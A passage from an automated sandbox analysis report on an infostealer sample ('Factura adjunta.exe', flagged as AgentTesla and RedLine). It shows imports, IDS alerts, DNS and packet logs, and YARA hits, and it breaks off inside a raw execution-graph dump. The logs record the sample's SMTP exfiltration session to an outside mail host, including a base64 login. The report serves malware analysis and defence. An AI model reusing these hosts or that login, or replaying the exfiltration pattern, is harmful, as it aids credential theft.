                          KERNEL32.DLLLoadLibraryA, GetProcAddress, VirtualProtect, VirtualAlloc, VirtualFree, ExitProcess
                          ADVAPI32.dllGetAce
                          COMCTL32.dllImageList_Remove
                          COMDLG32.dllGetOpenFileNameW
                          GDI32.dllLineTo
                          IPHLPAPI.DLLIcmpSendEcho
                          MPR.dllWNetUseConnectionW
                          ole32.dllCoGetObject
                          OLEAUT32.dllVariantInit
                          PSAPI.DLLGetProcessMemoryInfo
                          SHELL32.dllDragFinish
                          USER32.dllGetDC
                          USERENV.dllLoadUserProfileW
                          UxTheme.dllIsThemeActive
                          VERSION.dllVerQueryValueW
                          WININET.dllFtpOpenFileW
                          WINMM.dlltimeGetTime
                          WSOCK32.dllconnect

                          Possible Origin

                          Language of compilation systemCountry where language is spokenMap
                          EnglishGreat Britain

                          Network Behavior

                          Snort IDS Alerts

                          TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                          07/04/24-00:04:15.983243TCP2030171ET TROJAN AgentTesla Exfil Via SMTP49713587192.168.2.6101.100.211.111

                          Network Port Distribution

                          TCP Packets

                          TimestampSource PortDest PortSource IPDest IP
                          Jul 4, 2024 00:04:09.566297054 CEST49711443192.168.2.6104.26.12.205
                          Jul 4, 2024 00:04:09.566323996 CEST44349711104.26.12.205192.168.2.6
                          Jul 4, 2024 00:04:09.566400051 CEST49711443192.168.2.6104.26.12.205
                          Jul 4, 2024 00:04:09.574280024 CEST49711443192.168.2.6104.26.12.205
                          Jul 4, 2024 00:04:09.574294090 CEST44349711104.26.12.205192.168.2.6
                          Jul 4, 2024 00:04:10.060869932 CEST44349711104.26.12.205192.168.2.6
                          Jul 4, 2024 00:04:10.060966969 CEST49711443192.168.2.6104.26.12.205
                          Jul 4, 2024 00:04:10.064234972 CEST49711443192.168.2.6104.26.12.205
                          Jul 4, 2024 00:04:10.064248085 CEST44349711104.26.12.205192.168.2.6
                          Jul 4, 2024 00:04:10.064565897 CEST44349711104.26.12.205192.168.2.6
                          Jul 4, 2024 00:04:10.112829924 CEST49711443192.168.2.6104.26.12.205
                          Jul 4, 2024 00:04:10.123771906 CEST49711443192.168.2.6104.26.12.205
                          Jul 4, 2024 00:04:10.164508104 CEST44349711104.26.12.205192.168.2.6
                          Jul 4, 2024 00:04:10.239402056 CEST44349711104.26.12.205192.168.2.6
                          Jul 4, 2024 00:04:10.239456892 CEST44349711104.26.12.205192.168.2.6
                          Jul 4, 2024 00:04:10.239506006 CEST49711443192.168.2.6104.26.12.205
                          Jul 4, 2024 00:04:10.245733976 CEST49711443192.168.2.6104.26.12.205
                          Jul 4, 2024 00:04:10.260576963 CEST4971280192.168.2.6208.95.112.1
                          Jul 4, 2024 00:04:10.267955065 CEST8049712208.95.112.1192.168.2.6
                          Jul 4, 2024 00:04:10.268023014 CEST4971280192.168.2.6208.95.112.1
                          Jul 4, 2024 00:04:10.268132925 CEST4971280192.168.2.6208.95.112.1
                          Jul 4, 2024 00:04:10.275247097 CEST8049712208.95.112.1192.168.2.6
                          Jul 4, 2024 00:04:10.772963047 CEST8049712208.95.112.1192.168.2.6
                          Jul 4, 2024 00:04:10.815996885 CEST4971280192.168.2.6208.95.112.1
                          Jul 4, 2024 00:04:11.810991049 CEST4971280192.168.2.6208.95.112.1
                          Jul 4, 2024 00:04:11.820120096 CEST8049712208.95.112.1192.168.2.6
                          Jul 4, 2024 00:04:11.820179939 CEST4971280192.168.2.6208.95.112.1
                          Jul 4, 2024 00:04:12.163749933 CEST49713587192.168.2.6101.100.211.111
                          Jul 4, 2024 00:04:12.168662071 CEST58749713101.100.211.111192.168.2.6
                          Jul 4, 2024 00:04:12.168741941 CEST49713587192.168.2.6101.100.211.111
                          Jul 4, 2024 00:04:13.603497982 CEST58749713101.100.211.111192.168.2.6
                          Jul 4, 2024 00:04:13.603797913 CEST49713587192.168.2.6101.100.211.111
                          Jul 4, 2024 00:04:13.610964060 CEST58749713101.100.211.111192.168.2.6
                          Jul 4, 2024 00:04:13.936727047 CEST58749713101.100.211.111192.168.2.6
                          Jul 4, 2024 00:04:13.942270994 CEST49713587192.168.2.6101.100.211.111
                          Jul 4, 2024 00:04:13.949153900 CEST58749713101.100.211.111192.168.2.6
                          Jul 4, 2024 00:04:14.275250912 CEST58749713101.100.211.111192.168.2.6
                          Jul 4, 2024 00:04:14.275628090 CEST49713587192.168.2.6101.100.211.111
                          Jul 4, 2024 00:04:14.283035040 CEST58749713101.100.211.111192.168.2.6
                          Jul 4, 2024 00:04:14.791156054 CEST58749713101.100.211.111192.168.2.6
                          Jul 4, 2024 00:04:14.791418076 CEST49713587192.168.2.6101.100.211.111
                          Jul 4, 2024 00:04:14.799514055 CEST58749713101.100.211.111192.168.2.6
                          Jul 4, 2024 00:04:15.125021935 CEST58749713101.100.211.111192.168.2.6
                          Jul 4, 2024 00:04:15.125277042 CEST49713587192.168.2.6101.100.211.111
                          Jul 4, 2024 00:04:15.130074024 CEST58749713101.100.211.111192.168.2.6
                          Jul 4, 2024 00:04:15.651571989 CEST58749713101.100.211.111192.168.2.6
                          Jul 4, 2024 00:04:15.651751041 CEST49713587192.168.2.6101.100.211.111
                          Jul 4, 2024 00:04:15.656640053 CEST58749713101.100.211.111192.168.2.6
                          Jul 4, 2024 00:04:15.982645988 CEST58749713101.100.211.111192.168.2.6
                          Jul 4, 2024 00:04:15.983242989 CEST49713587192.168.2.6101.100.211.111
                          Jul 4, 2024 00:04:15.983308077 CEST49713587192.168.2.6101.100.211.111
                          Jul 4, 2024 00:04:15.983330965 CEST49713587192.168.2.6101.100.211.111
                          Jul 4, 2024 00:04:15.983366013 CEST49713587192.168.2.6101.100.211.111
                          Jul 4, 2024 00:04:15.988154888 CEST58749713101.100.211.111192.168.2.6
                          Jul 4, 2024 00:04:15.988174915 CEST58749713101.100.211.111192.168.2.6
                          Jul 4, 2024 00:04:15.988193989 CEST58749713101.100.211.111192.168.2.6
                          Jul 4, 2024 00:04:15.988248110 CEST58749713101.100.211.111192.168.2.6
                          Jul 4, 2024 00:04:16.593020916 CEST58749713101.100.211.111192.168.2.6
                          Jul 4, 2024 00:04:16.644097090 CEST49713587192.168.2.6101.100.211.111
                          Jul 4, 2024 00:05:51.831911087 CEST49713587192.168.2.6101.100.211.111
                          Jul 4, 2024 00:05:51.839405060 CEST58749713101.100.211.111192.168.2.6
                          Jul 4, 2024 00:05:52.366641045 CEST58749713101.100.211.111192.168.2.6
                          Jul 4, 2024 00:05:52.366689920 CEST58749713101.100.211.111192.168.2.6
                          Jul 4, 2024 00:05:52.366791964 CEST49713587192.168.2.6101.100.211.111
                          Jul 4, 2024 00:05:52.366868973 CEST49713587192.168.2.6101.100.211.111
                          Jul 4, 2024 00:05:52.373739958 CEST58749713101.100.211.111192.168.2.6

                          UDP Packets

                          TimestampSource PortDest PortSource IPDest IP
                          Jul 4, 2024 00:04:09.554394007 CEST5803353192.168.2.61.1.1.1
                          Jul 4, 2024 00:04:09.561696053 CEST53580331.1.1.1192.168.2.6
                          Jul 4, 2024 00:04:10.250461102 CEST5677253192.168.2.61.1.1.1
                          Jul 4, 2024 00:04:10.259905100 CEST53567721.1.1.1192.168.2.6
                          Jul 4, 2024 00:04:11.816092014 CEST5389553192.168.2.61.1.1.1
                          Jul 4, 2024 00:04:12.162637949 CEST53538951.1.1.1192.168.2.6
                          Jul 4, 2024 00:04:53.839930058 CEST5355509162.159.36.2192.168.2.6
                          Jul 4, 2024 00:04:54.705579996 CEST53575221.1.1.1192.168.2.6

                          DNS Queries

                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                          Jul 4, 2024 00:04:09.554394007 CEST192.168.2.61.1.1.10xb8bfStandard query (0)api.ipify.orgA (IP address)IN (0x0001)false
                          Jul 4, 2024 00:04:10.250461102 CEST192.168.2.61.1.1.10x815bStandard query (0)ip-api.comA (IP address)IN (0x0001)false
                          Jul 4, 2024 00:04:11.816092014 CEST192.168.2.61.1.1.10xcd19Standard query (0)mail.floormelody.com.sgA (IP address)IN (0x0001)false

                          DNS Answers

                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                          Jul 4, 2024 00:04:09.561696053 CEST1.1.1.1192.168.2.60xb8bfNo error (0)api.ipify.org104.26.12.205A (IP address)IN (0x0001)false
                          Jul 4, 2024 00:04:09.561696053 CEST1.1.1.1192.168.2.60xb8bfNo error (0)api.ipify.org172.67.74.152A (IP address)IN (0x0001)false
                          Jul 4, 2024 00:04:09.561696053 CEST1.1.1.1192.168.2.60xb8bfNo error (0)api.ipify.org104.26.13.205A (IP address)IN (0x0001)false
                          Jul 4, 2024 00:04:10.259905100 CEST1.1.1.1192.168.2.60x815bNo error (0)ip-api.com208.95.112.1A (IP address)IN (0x0001)false
                          Jul 4, 2024 00:04:12.162637949 CEST1.1.1.1192.168.2.60xcd19No error (0)mail.floormelody.com.sg101.100.211.111A (IP address)IN (0x0001)false

                          HTTP Request Dependency Graph

                          • api.ipify.org
                          • ip-api.com

                          HTTP Packets

                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          0192.168.2.649712208.95.112.1805688C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                          TimestampBytes transferredDirectionData
                          Jul 4, 2024 00:04:10.268132925 CEST80OUTGET /line/?fields=hosting HTTP/1.1
                          Host: ip-api.com
                          Connection: Keep-Alive
                          Jul 4, 2024 00:04:10.772963047 CEST175INHTTP/1.1 200 OK
                          Date: Wed, 03 Jul 2024 22:04:09 GMT
                          Content-Type: text/plain; charset=utf-8
                          Content-Length: 6
                          Access-Control-Allow-Origin: *
                          X-Ttl: 60
                          X-Rl: 44
                          Data Raw: 66 61 6c 73 65 0a
                          Data Ascii: false


                          HTTPS Proxied Packets

                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          0192.168.2.649711104.26.12.2054435688C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                          TimestampBytes transferredDirectionData
                          2024-07-03 22:04:10 UTC155OUTGET / HTTP/1.1
                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
                          Host: api.ipify.org
                          Connection: Keep-Alive
                          2024-07-03 22:04:10 UTC211INHTTP/1.1 200 OK
                          Date: Wed, 03 Jul 2024 22:04:10 GMT
                          Content-Type: text/plain
                          Content-Length: 11
                          Connection: close
                          Vary: Origin
                          CF-Cache-Status: DYNAMIC
                          Server: cloudflare
                          CF-RAY: 89da2b739db44385-EWR
                          2024-07-03 22:04:10 UTC11INData Raw: 38 2e 34 36 2e 31 32 33 2e 33 33
                          Data Ascii: 8.46.123.33


                          SMTP Packets

                          TimestampSource PortDest PortSource IPDest IPCommands
                          Jul 4, 2024 00:04:13.603497982 CEST58749713101.100.211.111192.168.2.6220-web204.vodien.com ESMTP Exim 4.96.1 #2 Thu, 04 Jul 2024 06:04:14 +0800
                          220-We do not authorize the use of this system to transport unsolicited,
                          220 and/or bulk e-mail.
                          Jul 4, 2024 00:04:13.603797913 CEST49713587192.168.2.6101.100.211.111EHLO 979764
                          Jul 4, 2024 00:04:13.936727047 CEST58749713101.100.211.111192.168.2.6250-web204.vodien.com Hello 979764 [8.46.123.33]
                          250-SIZE 157286400
                          250-8BITMIME
                          250-PIPELINING
                          250-PIPECONNECT
                          250-AUTH PLAIN LOGIN
                          250-STARTTLS
                          250 HELP
                          Jul 4, 2024 00:04:13.942270994 CEST49713587192.168.2.6101.100.211.111AUTH login cGF5bWVudHNAZmxvb3JtZWxvZHkuY29tLnNn
                          Jul 4, 2024 00:04:14.275250912 CEST58749713101.100.211.111192.168.2.6334 UGFzc3dvcmQ6
                          Jul 4, 2024 00:04:14.791156054 CEST58749713101.100.211.111192.168.2.6235 Authentication succeeded
                          Jul 4, 2024 00:04:14.791418076 CEST49713587192.168.2.6101.100.211.111MAIL FROM:<payments@floormelody.com.sg>
                          Jul 4, 2024 00:04:15.125021935 CEST58749713101.100.211.111192.168.2.6250 OK
                          Jul 4, 2024 00:04:15.125277042 CEST49713587192.168.2.6101.100.211.111RCPT TO:<accounts@electronex.com.sg>
                          Jul 4, 2024 00:04:15.651571989 CEST58749713101.100.211.111192.168.2.6250 Accepted
                          Jul 4, 2024 00:04:15.651751041 CEST49713587192.168.2.6101.100.211.111DATA
                          Jul 4, 2024 00:04:15.982645988 CEST58749713101.100.211.111192.168.2.6354 Enter message, ending with "." on a line by itself
                          Jul 4, 2024 00:04:15.983366013 CEST49713587192.168.2.6101.100.211.111.
                          Jul 4, 2024 00:04:16.593020916 CEST58749713101.100.211.111192.168.2.6250 OK id=1sP85I-00Ev7O-1p
                          Jul 4, 2024 00:05:51.831911087 CEST49713587192.168.2.6101.100.211.111QUIT
                          Jul 4, 2024 00:05:52.366641045 CEST58749713101.100.211.111192.168.2.6221 web204.vodien.com closing connection

                          Statistics

                          CPU Usage

                          Click to jump to process

                          Memory Usage

                          Click to jump to process

                          High Level Behavior Distribution

                          Click to dive into process behavior distribution

                          Behavior

                          Click to jump to process

                          System Behavior

                          General

                          Target ID:0
                          Start time:18:04:06
                          Start date:03/07/2024
                          Path:C:\Users\user\Desktop\Factura adjunta.exe
                          Wow64 process (32bit):true
                          Commandline:"C:\Users\user\Desktop\Factura adjunta.exe"
                          Imagebase:0x7b0000
                          File size:677'376 bytes
                          MD5 hash:D1E434198EB156114E542143D9A16745
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Yara matches:
                          • Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: 00000000.00000002.2199198462.0000000000E20000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen
                          Reputation:low
                          Has exited:true

                          General

                          Target ID:2
                          Start time:18:04:07
                          Start date:03/07/2024
                          Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                          Wow64 process (32bit):true
                          Commandline:"C:\Users\user\Desktop\Factura adjunta.exe"
                          Imagebase:0x830000
                          File size:45'984 bytes
                          MD5 hash:9D352BC46709F0CB5EC974633A0C3C94
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Yara matches:
                          • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000002.00000002.4640275179.0000000002F81000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                          • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000002.00000002.4640275179.0000000002F89000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000002.4640275179.0000000002F57000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                          • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000002.00000002.4640275179.0000000002F57000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000002.4641648764.0000000003EF1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                          • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000002.00000002.4641648764.0000000003EF1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                          • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000002.00000002.4641648764.0000000003EF1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                          • Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: 00000002.00000002.4638677256.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: ditekSHen
                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000002.4639975848.0000000002ADF000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                          • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000002.00000002.4639975848.0000000002ADF000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                          • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000002.00000002.4639975848.0000000002ADF000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000002.4642126380.0000000005270000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                          • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: 00000002.00000002.4642126380.0000000005270000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                          • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000002.00000002.4642126380.0000000005270000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                          • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000002.00000002.4642126380.0000000005270000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                          • Rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID, Description: Detects executables referencing Windows vault credential objects. Observed in infostealers, Source: 00000002.00000002.4642126380.0000000005270000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen
                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000002.4640161809.0000000002E70000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                          • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: 00000002.00000002.4640161809.0000000002E70000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                          • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000002.00000002.4640161809.0000000002E70000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                          • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000002.00000002.4640161809.0000000002E70000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                          • Rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID, Description: Detects executables referencing Windows vault credential objects. Observed in infostealers, Source: 00000002.00000002.4640161809.0000000002E70000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen
                          Reputation:high
                          Has exited:false

                          Disassembly

                          Reset < >

                            Execution Graph

                            Execution Coverage:4%
                            Dynamic/Decrypted Code Coverage:0.4%
                            Signature Coverage:4.8%
                            Total number of Nodes:2000
                            Total number of Limit Nodes:63
                            execution_graph 98524 7be70b 98527 7bd260 98524->98527 98526 7be719 98528 7bd27d 98527->98528 98550 7bd4dd 98527->98550 98529 7f2abb 98528->98529 98530 7f2b0a 98528->98530 98551 7bd2a4 98528->98551 98533 7f2abe 98529->98533 98541 7f2ad9 98529->98541 98601 82a6fb 340 API calls __cinit 98530->98601 98534 7f2aca 98533->98534 98533->98551 98599 82ad0f 340 API calls 98534->98599 98538 7bd594 98590 7b8bb2 68 API calls 98538->98590 98539 7f2cdf 98539->98539 98540 7bd6ab 98540->98526 98541->98550 98600 82b1b7 340 API calls 3 library calls 98541->98600 98545 7bd5a3 98545->98526 98546 7f2c26 98609 82aa66 89 API calls 98546->98609 98550->98540 98610 81a0b5 89 API calls 4 library calls 98550->98610 98551->98538 98551->98540 98551->98546 98551->98550 98561 7ba000 98551->98561 98584 7b88a0 68 API calls __cinit 98551->98584 98585 7b86a2 68 API calls 98551->98585 98586 7b8620 98551->98586 98591 7b859a 68 API calls 98551->98591 98592 7bd0dc 340 API calls 98551->98592 98593 7b9f3a 59 API calls Mailbox 98551->98593 98594 7d2f80 98551->98594 98597 7bd060 89 API calls 98551->98597 98598 7bcedd 340 API calls 98551->98598 98602 7b8bb2 68 API calls 98551->98602 98603 7b9e9c 60 API calls Mailbox 98551->98603 98604 806d03 60 API calls 98551->98604 98605 7b81a7 98551->98605 98562 7ba01f 98561->98562 98579 7ba04d Mailbox 98561->98579 98611 7d0ff6 98562->98611 98564 7bb5d5 98565 7b81a7 59 API calls 98564->98565 98578 7ba1b7 98565->98578 98566 7b77c7 59 API calls 98566->98579 98567 7d0ff6 59 API calls Mailbox 98567->98579 98570 7f047f 98623 81a0b5 89 API calls 4 library calls 98570->98623 98573 7b81a7 59 API calls 98573->98579 98575 807405 59 API calls 98575->98579 98576 7f048e 98576->98551 98577 7d2f80 67 API calls __cinit 98577->98579 98578->98551 98579->98564 98579->98566 98579->98567 98579->98570 98579->98573 98579->98575 98579->98577 98579->98578 98580 7f0e00 98579->98580 98582 7ba6ba 98579->98582 98583 7bb5da 98579->98583 98621 7bca20 340 API calls 2 library calls 98579->98621 98622 7bba60 60 API calls Mailbox 98579->98622 98625 81a0b5 89 API calls 4 library calls 98580->98625 98624 81a0b5 89 API calls 4 library calls 98582->98624 98626 81a0b5 89 API calls 4 library calls 98583->98626 98584->98551 98585->98551 98587 7b862b 98586->98587 98589 7b8652 98587->98589 98655 7b8b13 69 API calls Mailbox 98587->98655 98589->98551 98590->98545 98591->98551 98592->98551 98593->98551 98656 7d2e84 98594->98656 98596 7d2f8b 98596->98551 98597->98551 98598->98551 98599->98540 98600->98550 98601->98551 98602->98551 98603->98551 98604->98551 98606 7b81ba 98605->98606 98607 7b81b2 98605->98607 98606->98551 98740 7b80d7 59 API calls 2 library calls 98607->98740 98609->98550 98610->98539 98613 7d0ffe 98611->98613 98614 7d1018 98613->98614 98616 7d101c std::exception::exception 98613->98616 98627 7d594c 98613->98627 98644 7d35e1 RtlDecodePointer 98613->98644 98614->98579 98645 7d87db RaiseException 98616->98645 98618 7d1046 98646 7d8711 58 API calls _free 98618->98646 98620 7d1058 98620->98579 98621->98579 98622->98579 98623->98576 98624->98578 98625->98583 98626->98578 98628 7d59c7 98627->98628 98636 7d5958 98627->98636 98653 7d35e1 RtlDecodePointer 98628->98653 98630 7d59cd 98654 7d8d68 58 API calls __getptd_noexit 98630->98654 98633 7d598b RtlAllocateHeap 98633->98636 98643 7d59bf 98633->98643 98635 7d5963 98635->98636 98647 7da3ab 58 API calls __NMSG_WRITE 98635->98647 98648 7da408 58 API calls 7 library calls 98635->98648 98649 7d32df GetModuleHandleExW GetProcAddress ExitProcess ___crtCorExitProcess 98635->98649 98636->98633 98636->98635 98637 7d59b3 98636->98637 98641 7d59b1 98636->98641 98650 7d35e1 RtlDecodePointer 98636->98650 98651 7d8d68 58 API calls __getptd_noexit 98637->98651 98652 7d8d68 58 API calls __getptd_noexit 98641->98652 98643->98613 98644->98613 98645->98618 98646->98620 98647->98635 98648->98635 98650->98636 98651->98641 98652->98643 98653->98630 98654->98643 98655->98589 98657 7d2e90 __commit 98656->98657 98664 7d3457 98657->98664 98663 7d2eb7 __commit 98663->98596 98681 7d9e4b 98664->98681 98666 7d2e99 98667 7d2ec8 RtlDecodePointer RtlDecodePointer 98666->98667 98668 7d2ef5 98667->98668 98669 7d2ea5 98667->98669 98668->98669 98733 7d89e4 59 API calls __commit 98668->98733 98678 7d2ec2 98669->98678 98671 7d2f58 RtlEncodePointer RtlEncodePointer 98671->98669 98672 7d2f07 98672->98671 98673 7d2f2c 98672->98673 98734 7d8aa4 61 API calls 2 library calls 98672->98734 98673->98669 98677 7d2f46 RtlEncodePointer 98673->98677 98735 7d8aa4 61 API calls 2 library calls 98673->98735 98676 7d2f40 98676->98669 98676->98677 98677->98671 98736 7d3460 98678->98736 98682 7d9e5c 98681->98682 98683 7d9e6f RtlEnterCriticalSection 98681->98683 98688 7d9ed3 98682->98688 98683->98666 98685 7d9e62 98685->98683 98712 7d32f5 58 API calls 3 library calls 98685->98712 98689 7d9edf __commit 98688->98689 98690 7d9ee8 98689->98690 98691 7d9f00 98689->98691 98713 7da3ab 58 API calls __NMSG_WRITE 98690->98713 98695 7d9f21 __commit 98691->98695 98716 7d8a5d 98691->98716 98693 7d9eed 98714 7da408 58 API calls 7 library calls 98693->98714 98695->98685 98698 7d9ef4 98715 7d32df GetModuleHandleExW GetProcAddress ExitProcess ___crtCorExitProcess 98698->98715 98699 7d9f1c 98722 7d8d68 58 API calls __getptd_noexit 98699->98722 98700 7d9f2b 98701 7d9e4b __lock 58 API calls 98700->98701 98704 7d9f32 98701->98704 98706 7d9f3f 98704->98706 98707 7d9f57 98704->98707 98723 7da06b InitializeCriticalSectionAndSpinCount 98706->98723 98724 7d2f95 98707->98724 98710 7d9f4b 98730 7d9f73 RtlLeaveCriticalSection _doexit 98710->98730 98713->98693 98714->98698 98719 7d8a6b 98716->98719 98717 7d594c std::exception::_Copy_str 58 API calls 98717->98719 98718 7d8a9d 98718->98699 98718->98700 98719->98717 98719->98718 98721 7d8a7e 98719->98721 98721->98718 98721->98719 98731 7da372 Sleep 98721->98731 98722->98695 98723->98710 98725 7d2f9e RtlFreeHeap 98724->98725 98729 7d2fc7 __dosmaperr 98724->98729 98726 7d2fb3 98725->98726 98725->98729 98732 7d8d68 58 API calls __getptd_noexit 98726->98732 98728 7d2fb9 GetLastError 98728->98729 98729->98710 98730->98695 98731->98721 98732->98728 98733->98672 98734->98673 98735->98676 98739 7d9fb5 RtlLeaveCriticalSection 98736->98739 98738 7d2ec7 98738->98663 98739->98738 98740->98606 98741 7b568a 98748 7b5c18 98741->98748 98747 7b56ba Mailbox 98749 7d0ff6 Mailbox 59 API calls 98748->98749 98750 7b5c2b 98749->98750 98751 7d0ff6 Mailbox 59 API calls 98750->98751 98752 7b569c 98751->98752 98753 7b5632 98752->98753 98760 7b5a2f 98753->98760 98756 7b5674 98756->98747 98759 7b81c1 61 API calls Mailbox 98756->98759 98757 7b5643 98757->98756 98767 7b5d20 98757->98767 98773 7b5bda 98757->98773 98759->98747 98761 7ee065 98760->98761 98762 7b5a40 98760->98762 98782 806443 59 API calls Mailbox 98761->98782 98762->98757 98764 7ee06f 98765 7d0ff6 Mailbox 59 API calls 98764->98765 98766 7ee07b 98765->98766 98768 7b5d2e 98767->98768 98769 7b5d93 98767->98769 98770 7b5d56 98768->98770 98772 7b5d66 ReadFile 98768->98772 98783 7b5dae SetFilePointerEx 98769->98783 98770->98757 98772->98768 98772->98770 98774 7b5bee 98773->98774 98775 7ee117 98773->98775 98784 7b5b19 98774->98784 98789 806443 59 API calls Mailbox 98775->98789 98778 7b5bfa 98778->98757 98779 7ee122 98780 7d0ff6 Mailbox 59 API calls 98779->98780 98781 7ee137 _memmove 98780->98781 98782->98764 98783->98768 98785 7b5b31 98784->98785 98788 7b5b2a _memmove 98784->98788 98786 7d0ff6 Mailbox 59 API calls 98785->98786 98787 7ee0a7 98785->98787 98786->98788 98788->98778 98789->98779 98790 7b1078 98795 7b71eb 98790->98795 98792 7b108c 98793 7d2f80 __cinit 67 API calls 98792->98793 98794 7b1096 98793->98794 98796 7b71fb __ftell_nolock 98795->98796 98826 7b77c7 98796->98826 98800 7b72ba 98838 7d074f 98800->98838 98807 7b77c7 59 API calls 98808 7b72eb 98807->98808 98857 7b7eec 98808->98857 98810 7b72f4 RegOpenKeyExW 98811 7eecda RegQueryValueExW 98810->98811 98815 7b7316 Mailbox 98810->98815 98812 7eed6c RegCloseKey 98811->98812 98813 7eecf7 98811->98813 98812->98815 98824 7eed7e _wcscat Mailbox __wsetenvp 98812->98824 98814 7d0ff6 Mailbox 59 API calls 98813->98814 98816 7eed10 98814->98816 98815->98792 98861 7b538e 98816->98861 98819 7eed38 98864 7b7d2c 98819->98864 98821 7eed52 98821->98812 98823 7b3f84 59 API calls 98823->98824 98824->98815 98824->98823 98825 7b7b52 59 API calls 98824->98825 98873 7b7f41 98824->98873 98825->98824 98827 7d0ff6 Mailbox 59 API calls 98826->98827 98828 7b77e8 98827->98828 98829 7d0ff6 Mailbox 59 API calls 98828->98829 98830 7b72b1 98829->98830 98831 7b4864 98830->98831 98877 7e1b90 98831->98877 98834 7b7f41 59 API calls 98835 7b4897 98834->98835 98879 7b48ae 98835->98879 98837 7b48a1 Mailbox 98837->98800 98839 7e1b90 __ftell_nolock 98838->98839 98840 7d075c GetFullPathNameW 98839->98840 98841 7d077e 98840->98841 98842 7b7d2c 59 API calls 98841->98842 98843 7b72c5 98842->98843 98844 7b7e0b 98843->98844 98845 7b7e1f 98844->98845 98846 7ef173 98844->98846 98901 7b7db0 98845->98901 98906 7b8189 98846->98906 98849 7b72d3 98851 7b3f84 98849->98851 98850 7ef17e __wsetenvp _memmove 98852 7b3f92 98851->98852 98856 7b3fb4 _memmove 98851->98856 98854 7d0ff6 Mailbox 59 API calls 98852->98854 98853 7d0ff6 Mailbox 59 API calls 98855 7b3fc8 98853->98855 98854->98856 98855->98807 98856->98853 98858 7b7f06 98857->98858 98860 7b7ef9 98857->98860 98859 7d0ff6 Mailbox 59 API calls 98858->98859 98859->98860 98860->98810 98862 7d0ff6 Mailbox 59 API calls 98861->98862 98863 7b53a0 RegQueryValueExW 98862->98863 98863->98819 98863->98821 98865 7b7d38 __wsetenvp 98864->98865 98866 7b7da5 98864->98866 98868 7b7d4e 98865->98868 98869 7b7d73 98865->98869 98867 7b7e8c 59 API calls 98866->98867 98872 7b7d56 _memmove 98867->98872 98909 7b8087 59 API calls Mailbox 98868->98909 98871 7b8189 59 API calls 98869->98871 98871->98872 98872->98821 98874 7b7f50 __wsetenvp _memmove 98873->98874 98875 7d0ff6 Mailbox 59 API calls 98874->98875 98876 7b7f8e 98875->98876 98876->98824 98878 7b4871 GetModuleFileNameW 98877->98878 98878->98834 98880 7e1b90 __ftell_nolock 98879->98880 98881 7b48bb GetFullPathNameW 98880->98881 98882 7b48da 98881->98882 98883 7b48f7 98881->98883 98884 7b7d2c 59 API calls 98882->98884 98885 7b7eec 59 API calls 98883->98885 98886 7b48e6 98884->98886 98885->98886 98889 7b7886 98886->98889 98890 7b7894 98889->98890 98893 